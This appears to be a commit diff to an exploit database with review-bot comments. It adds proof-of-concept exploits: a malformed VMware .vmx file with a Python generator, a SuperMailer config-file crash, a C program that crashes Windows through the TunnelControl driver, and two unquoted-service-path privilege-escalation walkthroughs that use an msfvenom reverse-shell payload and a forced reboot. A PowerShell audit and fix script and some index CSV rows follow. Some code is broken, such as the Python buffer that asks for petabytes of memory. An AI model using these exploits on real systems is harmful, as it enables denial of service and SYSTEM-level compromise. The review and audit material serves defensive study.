# memsize = "700000000000000000000000000000000000"
#
# Alternative larger memory allocations
#####
# USB
#####
usb.present = "TRUE"
#####
# Floppy
#####
floppy0.present = "FALSE"
#####
# IDE Storage
#####
ide1:0.present = "TRUE"
#Edit line below to change ISO to boot from
ide1:0.fileName = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.iso"
ide1:0.deviceType = "cdrom-image"
ide1:0.startConnected = "TRUE"
ide1:0.autodetect = "TRUE"
#####
# Network
#####
ethernet0.present = "TRUE"
ethernet0.connectionType = "nat"
# ethernet0.connectionType = "bridged"
#
# Switch these two to enable "Bridged" vs. "NAT"
#####
# Sound
#####
sound.present = "TRUE"
sound.virtualDev = "es1371"
sound.autoDetect = "TRUE"
sound.fileName = "-1"
#####
# Misc.
#
# (normal)  high
priority.grabbed = "high"
tools.syncTime = "TRUE"
workingDir = "."
#
# (16)  32  64
sched.mem.pShare.checkRate = "32"
#
# (32)  64  128
sched.mem.pshare.scanRate = "64"
#
# Higher resolution lockout, adjust values to exceed 800x600
svga.maxWidth = "8000000000000000000"
svga.maxHeight = "6000000000000000000"
#
# (F) T
isolation.tools.dnd.disable = "FALSE"
#
# (F) T
isolation.tools.hgfs.disable = "FALSE"
#
# (F) T
isolation.tools.copy.disable = "FALSE"
#
# (F) T
isolation.tools.paste.disable = "FALSE"
#
# (T) F
logging = "TRUE"
#
#
# (F) T
log.append = "FALSE"
#
# (3) number of older files kept
log.keepOld = "1"
#
# (0) microseconds
keyboard.typematicMinDelay = 100000000000000000
uuid.location = "56 4d f1 ae 7b ed fe a2-e2 0d 49 3d 6d 3c d4 4a"
uuid.bios = "56 4d f1 ae 7b ed fe a2-e2 0d 49 3d 6d 3c d4 4a"
ethernet0.addressType = "generated"
ethernet0.generatedAddress = "00:0c:29:3c:d4:4a"
ethernet0.generatedAddressOffset = "0"
checkpoint.vmState = "live-cd-iso.vmss"
tools.remindInstall = "TRUE"
Exploit code()
buffer = "A" * 118000000000000000
payload = buffer
try:
    f=open("PoC.vmx","w")
    print "[+] Creating %s evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
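Review bot: the Python block under "Exploit code()" cannot produce the PoC: `"A" * 118000000000000000` asks for about 118 PB of memory, the allocation raises before anything is written, and the bare `except:` hides that behind "File cannot be created"; it would also write a file of only `A`s, not the `.vmx` above, and it uses Python 2 `print` statements. Either remove it or make it write the `.vmx` content shown. The `.vmx` itself does not say which key triggers the crash: `memsize = "20000000000000"`, `svga.maxWidth = "8000000000000000000"`, `keyboard.typematicMinDelay = 100000000000000000` (unquoted, unlike every other value) and the long `ide1:0.fileName` are all out of range, so name the one that reproduces the DoS and what happens on open (hang, crash, error dialog). The `displayName`/`guestinfo` credit strings and the millw0rm URL are not advisory content, and "Affected: VMware Workstation Pro/Player 15.x" has no vendor reference behind it.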
           

@ -0,0 +1,62 @@
# Exploit Title: SuperMailer v11.20 - Buffer overflow DoS
# Exploit Author: Rafael Pedrero
# Discovery Date: 2021-02-07
# Vendor Homepage:
https://int.supermailer.de/download_newsletter_software.htm
# Software Link : https://int.supermailer.de/smintsw.zip /
https://int.supermailer.de/smintsw_x64.zip
# Tested Version: v11.20 32bit/64bit [11.20.0.2204]
# Tested on: Windows 7, 10
CVSS v3: 3.3
CVSS vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L
CWE: CWE-20
Vulnerability description: A vulnerability in Newsletter Software
SuperMailer v11.20 32bit/64bit [11.20.0.2204] could allow an attacker to
cause a process crash resulting in a Denial of service (DoS) condition for
the application on an affected system. The vulnerability exists due to
insufficient validation of certain elements with a configuration file
malformed. An attacker could exploit this vulnerability by sending a user a
malicious SMB (configuration file) file through a link or email attachment
and persuading the user to open the file with the affected software on the
local system. A successful exploit could allow the attacker to cause the
application to crash when trying to load the malicious file.
Proof of concept:
1.- Go to File -> Save program options...
2.- Save the file (default extension *.smb)
3.- Edit file and you introduce a lot of A in somewhere. Example: DoS.smb
file
Offset(h) 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F
00000000 10 03 00 00 00 00 00 00 A9 E5 7E 41 41 41 41 41 ........©å~AAAAA
00000010 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000020 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000030 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000040 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000050 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000060 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000070 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000080 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000090 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000A0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000B0 41 41 97 99 E5 40 00 00 00 00 00 00 00 00 00 00 AA—™å@..........
000000C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000000D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000000E0 00 00 00 00 00 00 6B 00 00 00 53 00 6F 00 66 00 ......k...S.o.f.
000000F0 74 00 77 00 61 00 72 00 65 00 5C 00 4D 00 69 00 t.w.a.r.e.\.M.i.
00000100 72 00 6B 00 6F 00 20 00 42 00 6F 00 65 00 65 00 r.k.o. .B.o.e.e.
00000110 72 00 20 00 53 00 6F 00 66 00 74 00 77 00 61 00 r. .S.o.f.t.w.a.
00000120 72 00 65 00 5C 00 53 00 75 00 70 00 65 00 72 00 r.e.\.S.u.p.e.r.
00000130 4D 00 61 00 69 00 6C 00 65 00 72 00 5C 00 54 00 M.a.i.l.e.r.\.T.
00000140 65 00 73 00 74 00 20 00 45 00 4D 00 61 00 69 00 e.s.t. .E.M.a.i.
00000150 6C 00 20 00 41 00 64 00 64 00 72 00 65 00 73 00 l. .A.d.d.r.e.s.
00000160 73 00 65 00 73 00 00 00 00 00 00 00 00 00 00 00 s.e.s...........
And save the file.
4.- Go to File -> Restore program options...
5.- The application "sm.exe" crash.
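Review bot: the title says "Buffer overflow" but the text supports only a crash: the CWE is CWE-20, the vector is A:L, and the PoC ends at "The application "sm.exe" crash" with no exception record, faulting address or register state, so the overflow claim is unsupported. Add the debugger output that shows the overrun (and then use a buffer-overflow CWE), or title it as a crash/DoS. "malicious SMB (configuration file) file" reads as the SMB protocol; it is the `.smb` program-options file from File -> Save program options and should be written that way. In the dump, the `41` bytes occupy offsets 0x0B to 0xB1; say which original field they replaced, since the bytes `A9 E5 7E` before them and `97 99 E5 40` after them are left unexplained and a reader cannot tell whether the length prefix at offset 0 was adjusted.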

@ -0,0 +1,48 @@
// Exploit Title: Tunnel Interface Driver - Denial of Service
// Date: 07/15/2022
// Exploit Author: ExAllocatePool2
// Vendor Homepage: https://www.microsoft.com/
// Software Link: https://www.microsoft.com/en-us/software-download/windows10
// Version: Windows 10 Pro Version 21H2 (OS Build 19044.1288)
// Tested on: Microsoft Windows
// GitHub Repository: https://github.com/Exploitables/MSRC-1
#include <Windows.h>
#include <stdio.h>
#define TARGET_DEVICE "\\\\.\\GLOBALROOT\\Device\\TunnelControl"
int main(int argc, char** argv);
int main(int argc, char** argv)
{
HANDLE h_driver = CreateFileA(TARGET_DEVICE, 0x80, 0, 0, OPEN_EXISTING, 0, 0);
unsigned long long input_output = 0x4242424242424242;
unsigned long bytes_returned = 0x43434343;
unsigned char unused = 0;
SetConsoleTitleA("https://msrc.microsoft.com/");
printf("[*] Microsoft Security and Response Center Report #1\n[*] Microsoft Tunnel Interface Driver Null Pointer Dereference Denial of Service Vulnerability\n[*] Exploit written by ExAllocatePool2\n[!] Let's exploit!");
if (h_driver == (HANDLE)-1)
{
printf("\n[-] Failed to obtain a handle to the vulnerable device driver. Error: %d (0x%x)", GetLastError(), GetLastError());
unused = getchar();
return 1;
}
printf("\n[+] Obtained a handle to the vulnerable device driver. Handle Value: 0x%p", h_driver);
printf("\n[!] Triggering a denial of service via arbitrary read in 3...");
for (int i = 2; i > 0; i--)
{
Sleep(1000);
printf("\n[!] %d...", i);
}
DeviceIoControl(h_driver, 0, &input_output, 8, &input_output, 8, &bytes_returned, 0);
unused = getchar();
printf("\n[-] Exploit failed. The machine should have crashed.");
return 0;
}
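Review bot: the program's own banner calls this a "Null Pointer Dereference", but the header says only "Denial of Service" and nothing explains why `DeviceIoControl` with control code `0` and an 8-byte `0x4242424242424242` buffer reaches a null dereference in the driver; add the dispatch detail or the crash dump (bug check code, faulting address) so the root cause is verifiable. State the privilege required: the handle is opened with desired access `0x80` (FILE_READ_ATTRIBUTES) on `\\.\GLOBALROOT\Device\TunnelControl`, which looks deliberate for getting past the device ACL as an unprivileged user, but the file never says whether a standard user can trigger it. The MSRC report is referenced only as "#1", with no case number, fix status or CVE. Minor: the forward declaration of `main` is unnecessary, and "[-] Exploit failed" is printed only after `getchar()` returns, so a user who does not press a key never sees it.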

@ -0,0 +1,66 @@
# Exploit Title: HDD Health 4.2.0.112 - 'HDDHealth' Unquoted Service Path
# Exploit Author: Jorge Manuel Lozano Gómez
# Date: 2022-10-19
# Vendor Homepage: https://www.panterasoft.com
# Software Link: https://hdd-health.softonic.com
# Version : 4.2.0.112
# Tested on: Windows 11 64bit
# CVE : N/A
About Unquoted Service Path :
==============================
When a service is created whose executable path contains spaces and isn't enclosed within quotes, leads to a vulnerability known as Unquoted Service Path which allows a user to gain SYSTEM privileges.
(only if the vulnerable service is running with SYSTEM privilege level which most of the time it is).
Description:
==============================
HDD Health installs a service with an unquoted service path.
To properly exploit this vulnerability, the local attacker must insert an executable file in the path of the service.
Upon service restart or system reboot, the malicious code will be run with elevated privileges.
# PoC
===========
1. Open CMD and check for the vulnerability by typing [ wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ ]
2. The vulnerable service would show up.
3. Check the service permissions by typing [ sc qc "HDDHealth" ]
4. The command would return..
C:\>sc qc "HDDHealth"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: HDDHealth
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files (x86)\HDD Health\HDDHealthService.exe
LOAD_ORDER_GROUP :
TAG : 0
ISPLAY_NAME : HDDHealth
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
5. This concludes that the service is running as SYSTEM.
6. Now create a payload with msfvenom or other tools and name it to HDDHealthService.exe.
7. Make sure you have write permissions to "C:\Program Files (x86)\HDD Health" directory.
8. Provided that you have right permissions, drop the HDDHealthService.exe executable you created into the "C:\Program Files (x86)\HDD Health" directory.
9. Start a listener.
9. Now restart the HDDHealth service by giving coommand [ sc stop HDDHealth ] followed by [ sc start HDDHealth ]
9.1 If you cannot stop and start the service, since the service is of type "AUTO_START" we can restart the system by executing [ shutdown /r /t 0 ] and get the shell when the service starts automatically.
10. Got shell.
During my testing :
Payload : msfvenom -p windows/shell_reverse_tcp -f exe -o HDDHealthService.exe
# Disclaimer
=============
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information.
The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
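Review bot: steps 6-8 do not exploit the unquoted path at all; they replace the service's own binary `HDDHealthService.exe` inside `C:\Program Files (x86)\HDD Health`, which needs write access to the install directory and would work just as well if the path were quoted. An unquoted `C:\Program Files (x86)\HDD Health\HDDHealthService.exe` is exploited by placing an executable at one of the prefixes the service controller tries first: `C:\Program.exe`, `C:\Program Files.exe` or `C:\Program Files (x86)\HDD.exe`. Rewrite the steps around one of those names, and show `icacls` output proving a standard user can write to that location, since none of them is writable by a standard user on a default install; without that evidence this is a misconfiguration finding, not a privilege escalation. Typos: step "9." is used twice, "coommand", and `ISPLAY_NAME` in the pasted `sc qc` output should read `DISPLAY_NAME`.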

@ -0,0 +1,66 @@
# Exploit Title: SugarSync 4.1.3 - 'SugarSync Service' Unquoted Service Path
# Exploit Author: Jorge Manuel Lozano Gómez
# Date: 2022-10-20
# Vendor Homepage: https://www1.sugarsync.com
# Software Link: https://www1.sugarsync.com/apps/windows/
# Version : 4.1.3
# Tested on: Windows 11 64bit
# CVE : N/A
About Unquoted Service Path :
==============================
When a service's executable path contains spaces and is not enclosed in quotes, Windows cannot tell where the file name ends and the arguments begin. CreateProcess therefore tries each space-delimited prefix of the path, with .exe appended, before it reaches the real binary (for "C:\Program Files (x86)\SugarSync\SugarSyncSvc.exe" it tries C:\Program.exe and "C:\Program Files.exe" first). A local user who can write an executable to one of those locations runs code in the service's security context, which is SYSTEM whenever the service runs as LocalSystem, as most do.
Description:
==============================
SugarSync installs a service with an unquoted service path.
To exploit it, a local attacker must be able to place an executable at one of the locations Windows tries before the real binary.
Upon service restart or system reboot, the planted code runs with the service's privileges, SYSTEM in this case.
# PoC
===========
1. Open CMD and look for candidate services by typing [ wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ ]
   (wmic is deprecated and missing from recent Windows 11 builds; in PowerShell [ Get-CimInstance Win32_Service | Select Name,PathName,StartMode,StartName ] lists the same fields.)
2. Any auto-start service whose path contains spaces, lies outside C:\Windows and is not quoted is listed.
3. Check the service configuration by typing [ sc qc "SugarSync Service" ]
4. The command returns:

C:\>sc qc "SugarSync Service"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: SugarSync Service
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\SugarSync\SugarSyncSvc.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : SugarSync Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

5. SERVICE_START_NAME : LocalSystem confirms the service runs as SYSTEM, and BINARY_PATH_NAME shows the unquoted path containing spaces.
6. Because the path is unquoted, CreateProcess resolves it by trying C:\Program.exe and then "C:\Program Files.exe" before the real binary (there is no space after "(x86)\SugarSync", so no third candidate exists). Create a payload with msfvenom or another tool and name it Program.exe or "Program Files.exe".
7. Confirm write access to C:\. On default Windows ACLs a standard user can create folders but not files in the root of the system drive, so the flaw is exploitable only where that permission has been loosened. Replacing SugarSyncSvc.exe inside "C:\Program Files (x86)\SugarSync" also works, but that requires write access to the install directory and is a binary-replacement weakness independent of quoting.
8. Drop the payload into that directory.
9. Start a listener.
10. Restart the service by typing [ sc stop "SugarSync Service" ] followed by [ sc start "SugarSync Service" ].
10.1 If your account is not allowed to stop and start the service, use the AUTO_START type: reboot with [ shutdown /r /t 0 ] and catch the shell when the service starts with the system.
11. Shell received as SYSTEM.
During my testing :
Payload : msfvenom -p windows/shell_reverse_tcp -f exe -o SugarSyncSvc.exe
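The SugarSync steps above, and the identical HDD Health procedure earlier in this commit, reduce to two checks: which file names Windows will try before the real service binary, and whether the account under test can plant a file at one of them. The PowerShell below is an added example written for this page, not code from either advisory author. It assumes Windows PowerShell 5.1 or later with the CIM cmdlets, reads service names and paths from the live machine, and probes writability by creating and deleting an empty temp file in each candidate directory. For the SugarSync path the candidates it derives are C:\Program.exe and "C:\Program Files.exe"; for HDD Health they are those two plus "C:\Program Files (x86)\HDD.exe". Repair-UnquotedServicePath quotes the path in place through Win32_Service.Change and needs an elevated session.

```powershell
# Added example for this page (not code from either advisory): audit a host
# for unquoted service paths, list the file names Windows tries before the
# real binary, probe whether the current user could plant a file there, and
# quote the path in place. Assumes Windows PowerShell 5.1+ with the CIM
# cmdlets. Service names and paths come from the live system.

function Get-HijackCandidates {
    # Mirrors CreateProcess resolution of an unquoted command line: every
    # whitespace-delimited prefix is tried in order, with ".exe" appended when
    # the prefix has no extension, and the first one that exists wins. The
    # real executable therefore ends the candidate list and is not returned.
    param([Parameter(Mandatory)][string]$ImagePath)
    $tokens = $ImagePath.Trim() -split '\s+'
    for ($i = 1; $i -lt $tokens.Count; $i++) {
        $prefix = $tokens[0..($i - 1)] -join ' '
        if (-not [System.IO.Path]::HasExtension($prefix)) { $prefix += '.exe' }
        if (Test-Path -LiteralPath $prefix -PathType Leaf) { break }
        $prefix
    }
}

function Test-DirectoryWritable {
    # Probes by creating and removing an empty, uniquely named file. Reading
    # the ACL instead would have to reproduce inheritance, deny ACEs and
    # nested group membership; the probe answers the real question directly.
    param([Parameter(Mandatory)][string]$Directory)
    if (-not (Test-Path -LiteralPath $Directory -PathType Container)) { return $false }
    $probe = Join-Path $Directory ('.usp-probe-' + [guid]::NewGuid().ToString('N'))
    try {
        [System.IO.File]::WriteAllBytes($probe, [byte[]]@())
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch {
        return $false
    }
}

function Get-UnquotedServicePath {
    # PowerShell counterpart of the advisory's wmic one-liner, extended with
    # the candidate locations and whether this account could write them.
    Get-CimInstance -ClassName Win32_Service |
        Where-Object {
            $_.PathName -and
            $_.PathName -notmatch '^\s*"' -and
            $_.PathName -match '\s' -and
            $_.PathName -notmatch '^[A-Za-z]:\\Windows\\'
        } |
        ForEach-Object {
            $svc = $_
            foreach ($candidate in Get-HijackCandidates -ImagePath $svc.PathName) {
                [pscustomobject]@{
                    Service   = $svc.Name
                    StartMode = $svc.StartMode
                    RunsAs    = $svc.StartName
                    ImagePath = $svc.PathName
                    Candidate = $candidate
                    Writable  = Test-DirectoryWritable -Directory (Split-Path -Path $candidate -Parent)
                }
            }
        }
}

function Repair-UnquotedServicePath {
    # Quotes the executable through Win32_Service.Change, which sidesteps the
    # nested-quote escaping that "sc config <name> binPath=" requires. Any
    # arguments after the executable stay outside the quotes. Run elevated.
    param([Parameter(Mandatory)][string]$Name)
    $svc = Get-CimInstance -ClassName Win32_Service | Where-Object Name -eq $Name
    if (-not $svc) { throw "Service '$Name' not found" }
    $tokens = $svc.PathName.Trim() -split '\s+'
    # The executable is the longest leading run of tokens that exists as a file.
    for ($i = $tokens.Count; $i -ge 1; $i--) {
        $exe = $tokens[0..($i - 1)] -join ' '
        if (-not (Test-Path -LiteralPath $exe -PathType Leaf)) { continue }
        $rest = if ($i -lt $tokens.Count) { ' ' + ($tokens[$i..($tokens.Count - 1)] -join ' ') } else { '' }
        $fixed = '"' + $exe + '"' + $rest
        $r = Invoke-CimMethod -InputObject $svc -MethodName Change -Arguments @{ PathName = $fixed }
        if ($r.ReturnValue -ne 0) { throw "Win32_Service.Change returned $($r.ReturnValue)" }
        return $fixed
    }
    throw "No existing executable found in '$($svc.PathName)'"
}

# Audit, run as the low-privileged account under assessment:
Get-UnquotedServicePath | Format-Table Service, StartMode, RunsAs, Candidate, Writable -AutoSize

# Remediation, from an elevated session, e.g. for the service in this advisory:
# Repair-UnquotedServicePath -Name 'SugarSync Service'
```

Run the audit as the account you are assessing, because Writable reflects that account's effective permissions. A row with Writable True whose RunsAs is LocalSystem is the exploitable case these advisories describe; Writable False for a candidate in C:\ is the expected result on an unmodified system, since standard users may create folders but not files in the root of the system drive. Quoting the path removes the ambiguity at its source, which is why the repair function changes the image path rather than the directory ACLs.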
# Disclaimer
=============
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information.
The author prohibits any malicious use of security related information or exploits by the author or elsewhere.


@ -1831,6 +1831,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48456,exploits/aspx/webapps/48456.txt,"Orchard Core RC1 - Persistent Cross-Site Scripting",2020-05-12,SunCSR,webapps,aspx,,2020-05-12,2020-05-12,0,,,,,, 48456,exploits/aspx/webapps/48456.txt,"Orchard Core RC1 - Persistent Cross-Site Scripting",2020-05-12,SunCSR,webapps,aspx,,2020-05-12,2020-05-12,0,,,,,,
41985,exploits/aspx/webapps/41985.txt,"Personify360 7.5.2/7.6.1 - Improper Access Restrictions",2017-05-09,"Pesach Zirkind",webapps,aspx,,2017-05-09,2017-07-03,0,CVE-2017-7312,,,,, 41985,exploits/aspx/webapps/41985.txt,"Personify360 7.5.2/7.6.1 - Improper Access Restrictions",2017-05-09,"Pesach Zirkind",webapps,aspx,,2017-05-09,2017-07-03,0,CVE-2017-7312,,,,,
41986,exploits/aspx/webapps/41986.txt,"Personify360 7.5.2/7.6.1 - Improper Database Schema Access Restrictions",2017-05-09,"Pesach Zirkind",webapps,aspx,,2017-05-09,2017-07-03,0,CVE-2017-7314,,,,, 41986,exploits/aspx/webapps/41986.txt,"Personify360 7.5.2/7.6.1 - Improper Database Schema Access Restrictions",2017-05-09,"Pesach Zirkind",webapps,aspx,,2017-05-09,2017-07-03,0,CVE-2017-7314,,,,,
51118,exploits/aspx/webapps/51118.txt,"ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS)",2023-03-28,"Okan Kurtulus",webapps,aspx,,2023-03-28,2023-03-28,0,CVE-2022-41441,,,,,
47777,exploits/aspx/webapps/47777.txt,"Roxy Fileman 1.4.5 - Directory Traversal",2019-12-16,"Patrik Lantz",webapps,aspx,,2019-12-16,2019-12-18,0,CVE-2019-19731,,,,, 47777,exploits/aspx/webapps/47777.txt,"Roxy Fileman 1.4.5 - Directory Traversal",2019-12-16,"Patrik Lantz",webapps,aspx,,2019-12-16,2019-12-18,0,CVE-2019-19731,,,,,
47589,exploits/aspx/webapps/47589.txt,"SD.NET RIM 4.7.3c - 'idtyp' SQL Injection",2019-11-05,"Fabian Mosch_ Nick Theisinger",webapps,aspx,80,2019-11-05,2019-11-05,0,,"SQL Injection (SQLi)",,,, 47589,exploits/aspx/webapps/47589.txt,"SD.NET RIM 4.7.3c - 'idtyp' SQL Injection",2019-11-05,"Fabian Mosch_ Nick Theisinger",webapps,aspx,80,2019-11-05,2019-11-05,0,,"SQL Injection (SQLi)",,,,
44285,exploits/aspx/webapps/44285.txt,"SecurEnvoy SecurMail 9.1.501 - Multiple Vulnerabilities",2018-03-13,"SEC Consult",webapps,aspx,,2018-03-13,2018-03-13,0,CVE-2018-7707;CVE-2018-7706;CVE-2018-7705;CVE-2018-7704;CVE-2018-7703;CVE-2018-7702;CVE-2018-7701,,,,, 44285,exploits/aspx/webapps/44285.txt,"SecurEnvoy SecurMail 9.1.501 - Multiple Vulnerabilities",2018-03-13,"SEC Consult",webapps,aspx,,2018-03-13,2018-03-13,0,CVE-2018-7707;CVE-2018-7706;CVE-2018-7705;CVE-2018-7704;CVE-2018-7703;CVE-2018-7702;CVE-2018-7701,,,,,
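Review bot: the new 51118 ReQlogic row leaves the tags column empty although its description names the vulnerability class, while the 47589 row in this same hunk carries "SQL Injection (SQLi)" in that column; give this row "Cross-Site Scripting (XSS)" the same way so class-based searches find it. The title also keeps a "v" prefix ("ReQlogic v11.3") where neighbouring rows write bare versions ("Personify360 7.5.2/7.6.1", "Roxy Fileman 1.4.5"); dropping the prefix keeps the version searchable as a plain token.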
@ -3851,6 +3852,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48514,exploits/hardware/remote/48514.rb,"Synology DiskStation Manager - smart.cgi Remote Command Execution (Metasploit)",2020-05-25,Metasploit,remote,hardware,,2020-05-25,2020-05-25,1,CVE-2017-15889,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/http/synology_dsm_smart_exec_auth.rb 48514,exploits/hardware/remote/48514.rb,"Synology DiskStation Manager - smart.cgi Remote Command Execution (Metasploit)",2020-05-25,Metasploit,remote,hardware,,2020-05-25,2020-05-25,1,CVE-2017-15889,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/http/synology_dsm_smart_exec_auth.rb
43609,exploits/hardware/remote/43609.py,"Synology Photo Station 6.8.2-3461 - 'SYNOPHOTO_Flickr_MultiUpload' Race Condition File Write Remote Code Execution",2018-01-15,mr_me,remote,hardware,,2018-01-15,2018-01-15,1,,,,,, 43609,exploits/hardware/remote/43609.py,"Synology Photo Station 6.8.2-3461 - 'SYNOPHOTO_Flickr_MultiUpload' Race Condition File Write Remote Code Execution",2018-01-15,mr_me,remote,hardware,,2018-01-15,2018-01-15,1,,,,,,
16100,exploits/hardware/remote/16100.txt,"Tandberg E & EX & C Series Endpoints - Default Root Account Credentials",2011-02-02,"Cisco Security",remote,hardware,,2011-02-02,2011-02-02,1,CVE-2011-0354;OSVDB-68309,,,,, 16100,exploits/hardware/remote/16100.txt,"Tandberg E & EX & C Series Endpoints - Default Root Account Credentials",2011-02-02,"Cisco Security",remote,hardware,,2011-02-02,2011-02-02,1,CVE-2011-0354;OSVDB-68309,,,,,
51107,exploits/hardware/remote/51107.txt,"Tapo C310 RTSP server v1.3.0 - Unauthorised Video Stream Access",2023-03-28,dsclee1,remote,hardware,,2023-03-28,2023-03-28,0,CVE-2022-37255,,,,,
44577,exploits/hardware/remote/44577.py,"TBK DVR4104 / DVR4216 - Credentials Leak",2018-05-02,ezelf,remote,hardware,,2018-05-03,2018-05-03,0,CVE-2018-9995,,,,,https://github.com/ezelf/CVE-2018-9995_dvr_credentials/blob/529a711e3db8c7265473bf122276fb295e5b973d/getDVR_Credentials.py 44577,exploits/hardware/remote/44577.py,"TBK DVR4104 / DVR4216 - Credentials Leak",2018-05-02,ezelf,remote,hardware,,2018-05-03,2018-05-03,0,CVE-2018-9995,,,,,https://github.com/ezelf/CVE-2018-9995_dvr_credentials/blob/529a711e3db8c7265473bf122276fb295e5b973d/getDVR_Credentials.py
43384,exploits/hardware/remote/43384.py,"Technicolor DPC3928SL - SNMP Authentication Bypass",2017-05-05,nixawk,remote,hardware,,2017-12-21,2017-12-21,0,CVE-2017-5135,,Stringbleed,,,https://github.com/nixawk/labs/blob/47d72af5b69bd4d2ec411b38313d33111a063c97/CVE-2017-5135/StringBleed-CVE-2017-5135.py 43384,exploits/hardware/remote/43384.py,"Technicolor DPC3928SL - SNMP Authentication Bypass",2017-05-05,nixawk,remote,hardware,,2017-12-21,2017-12-21,0,CVE-2017-5135,,Stringbleed,,,https://github.com/nixawk/labs/blob/47d72af5b69bd4d2ec411b38313d33111a063c97/CVE-2017-5135/StringBleed-CVE-2017-5135.py
35620,exploits/hardware/remote/35620.txt,"Technicolor THOMSON TG585v7 Wireless Router - 'url' Cross-Site Scripting",2011-04-15,"Edgard Chammas",remote,hardware,,2011-04-15,2014-12-26,1,,,,,,https://www.securityfocus.com/bid/47390/info 35620,exploits/hardware/remote/35620.txt,"Technicolor THOMSON TG585v7 Wireless Router - 'url' Cross-Site Scripting",2011-04-15,"Edgard Chammas",remote,hardware,,2011-04-15,2014-12-26,1,,,,,,https://www.securityfocus.com/bid/47390/info
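Review bot: the 51107 Tapo C310 row has an empty port column even though the description is about an RTSP server, and this file records the listening port for remote hardware entries when it is known (40328 records 8088, 37272 records 8080). If the PoC in 51107.txt talks to a fixed RTSP port, put it in the port column; if the port is configurable, leaving it empty is fine but worth confirming against the advisory.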
@ -5824,6 +5826,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
37272,exploits/jsp/webapps/37272.txt,"ZCMS 1.1 - Multiple Vulnerabilities",2015-06-12,hyp3rlinx,webapps,jsp,8080,2015-06-12,2016-10-10,1,CVE-2015-7347;CVE-2015-7346;OSVDB-123320;OSVDB-123319;OSVDB-123318,,,,http://www.exploit-db.comZCMS_1.1.zip, 37272,exploits/jsp/webapps/37272.txt,"ZCMS 1.1 - Multiple Vulnerabilities",2015-06-12,hyp3rlinx,webapps,jsp,8080,2015-06-12,2016-10-10,1,CVE-2015-7347;CVE-2015-7346;OSVDB-123320;OSVDB-123319;OSVDB-123318,,,,http://www.exploit-db.comZCMS_1.1.zip,
46967,exploits/jsp/webapps/46967.py,"Zimbra < 8.8.11 - XML External Entity Injection / Server-Side Request Forgery",2019-06-05,k8gege,webapps,jsp,,2019-06-05,2019-06-05,0,CVE-2019-9621,"XML External Entity (XXE)",,,, 46967,exploits/jsp/webapps/46967.py,"Zimbra < 8.8.11 - XML External Entity Injection / Server-Side Request Forgery",2019-06-05,k8gege,webapps,jsp,,2019-06-05,2019-06-05,0,CVE-2019-9621,"XML External Entity (XXE)",,,,
46967,exploits/jsp/webapps/46967.py,"Zimbra < 8.8.11 - XML External Entity Injection / Server-Side Request Forgery",2019-06-05,k8gege,webapps,jsp,,2019-06-05,2019-06-05,0,CVE-2019-9621,"Server-Side Request Forgery (SSRF)",,,, 46967,exploits/jsp/webapps/46967.py,"Zimbra < 8.8.11 - XML External Entity Injection / Server-Side Request Forgery",2019-06-05,k8gege,webapps,jsp,,2019-06-05,2019-06-05,0,CVE-2019-9621,"Server-Side Request Forgery (SSRF)",,,,
